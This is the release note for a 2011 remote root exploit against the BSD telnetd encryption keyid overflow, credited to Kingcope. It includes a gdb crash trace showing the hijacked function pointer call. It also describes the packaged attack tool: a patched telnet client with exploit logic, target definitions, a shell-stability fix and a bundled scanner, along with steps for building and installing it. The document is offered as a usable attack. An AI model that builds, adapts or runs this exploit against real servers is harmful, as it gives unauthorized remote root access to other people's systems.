ancient bsd remote root zeroday (encryption keyid overflow)
Discovered & Exploited by Kingcope
Year 2011
--

We overwrite function pointer.

encrypt.c last commit (freebsd):
Wed Jun 26 17:06:14 2002 UTC (8 years, 9 months ago) by markm
and even older bug :>

attached telnetd:
Program received signal SIGSEGV, Segmentation fault.
0x08055b22 in encrypt_keyid (kp=0x805e6a0, keyid=0x8061f02 'A' <repeats 100 times>, "", len=100) at 
/usr/src/lib/libtelnet/../../contrib/telnet/libtelnet/encrypt.c:724
warning: Source file is more recent than executable.

724             if (!(ep = (*kp->getcrypt)(*kp->modep))) {
(gdb) i r
eax            0x41414141       1094795585
ecx            0x64     100
edx            0x41414141       1094795585
ebx            0xbfbfec78       -1077941128
esp            0xbfbfe770       0xbfbfe770
ebp            0xbfbfe798       0xbfbfe798
esi            0x1      1
edi            0xbfbfec80       -1077941120
eip            0x8055b22        0x8055b22
eflags         0x10282  66178
cs             0x33     51
ss             0x3b     59
ds             0x3b     59
es             0x3b     59
fs             0x3b     59
gs             0x1b     27
(gdb) x/10i $eip
0x8055b22 <encrypt_keyid+34>:   mov    (%eax),%eax
0x8055b24 <encrypt_keyid+36>:   mov    %eax,(%esp)
0x8055b27 <encrypt_keyid+39>:   call   *%edx				<---- HAHA
0x8055b29 <encrypt_keyid+41>:   mov    %eax,0xfffffffc(%ebp)
0x8055b2c <encrypt_keyid+44>:   cmpl   $0x0,0xfffffffc(%ebp)
0x8055b30 <encrypt_keyid+48>:   jne    0x8055b4b <encrypt_keyid+75>
0x8055b32 <encrypt_keyid+50>:   cmpl   $0x0,0x10(%ebp)
0x8055b36 <encrypt_keyid+54>:   je     0x8055c87 <encrypt_keyid+391>
0x8055b3c <encrypt_keyid+60>:   mov    0x8(%ebp),%eax
0x8055b3f <encrypt_keyid+63>:   movl   $0x0,0x40(%eax)
(gdb)

* main patch code and exploit logic is in libtelnet/encrypt.c & telnet/telnet.c
* targets are defined in telnet/targets.h
* added FreeBSD amd64 targets
* fixed a bug where the shell would close on freebsd.
* a simple telnet scanner is included (telnetscan.c)

how to build:
1.) checkout src-all via freebsd cvsup
2.) untar the package into /usr/src/contrib/
3.) cd into /usr/src/lib/libtelnet and type make && make install
    cd into /usr/src/usr.bin/telnet and type make && make install
